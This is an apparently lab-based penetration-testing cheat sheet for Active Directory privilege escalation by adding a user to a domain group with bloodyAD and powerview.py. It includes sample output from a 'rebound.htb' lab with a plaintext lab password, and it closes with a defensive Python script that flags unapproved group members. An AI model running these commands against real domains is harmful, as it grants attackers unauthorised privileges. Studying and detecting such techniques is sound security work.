Privesc #1: Add User to Group (From Linux)
1. Add User to Group
# With password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> --dc-ip <DC_IP> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
# With Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> --dc-ip <DC_IP> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO
Ref: bloodyAD
1. Connect
# With password
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>'
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && powerview 'rebound.htb/oorend:1GR8t@$$4u@dc01.rebound.htb'
Logging directory is set to /home/kali/.powerview/logs/dc01.rebound.htb
[2024-09-24 07:11:06] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV >
# With Kerberos
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -k --no-pass
Sample Output:
TO-DO
2. Add User to Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
PV > Add-DomainGroupMember -Identity 'servicemgmt' -Members 'oorend'
[2024-09-24 07:13:17] User oorend successfully added to servicemgmt
# Check
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
PV > Get-DomainGroupMember -Identity 'servicemgmt'
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : ppaul
MemberDistinguishedName : CN=ppaul,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-1951
...[SNIP]...
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : oorend
MemberDistinguishedName : CN=oorend,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-7682
Ref: powerview.py
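Added example (not part of this page or of powerview.py): a review step for the "Check" output above, parsing `Get-DomainGroupMember`-style records and reporting members that are not on an approved baseline. The `APPROVED` mapping, the function names and the SIDs in `SAMPLE` are assumptions constructed for illustration.

```python
# SAMPLE is constructed from the record layout shown above; the SIDs are placeholders.
SAMPLE = """\
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : ppaul
MemberDistinguishedName : CN=ppaul,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-0-0-0-1951
...[SNIP]...
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : oorend
MemberDistinguishedName : CN=oorend,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-0-0-0-7682
"""

# Hypothetical baseline: group DN -> account names allowed to be members.
APPROVED = {"CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb": {"ppaul"}}


def parse_records(text):
    """Split 'Key : Value' lines into one dict per membership record."""
    records, cur = [], {}
    for line in text.splitlines():
        key, sep, value = line.partition(" : ")
        key = key.strip()
        # A repeated key, a blank line or a non key/value line ends the record.
        if not sep or key in cur:
            if cur:
                records.append(cur)
            cur = {}
            if not sep:
                continue
        cur[key] = value.strip()
    if cur:
        records.append(cur)
    return records


def unexpected_members(text, approved):
    """Return {group DN: [members not in the baseline]}; unknown groups fail closed."""
    allowed = {g.lower(): {m.lower() for m in ms} for g, ms in approved.items()}
    findings = {}
    for rec in parse_records(text):
        group, member = rec.get("GroupDistinguishedName"), rec.get("MemberName")
        if group and member and member.lower() not in allowed.get(group.lower(), set()):
            findings.setdefault(group, []).append(member)
    return findings
```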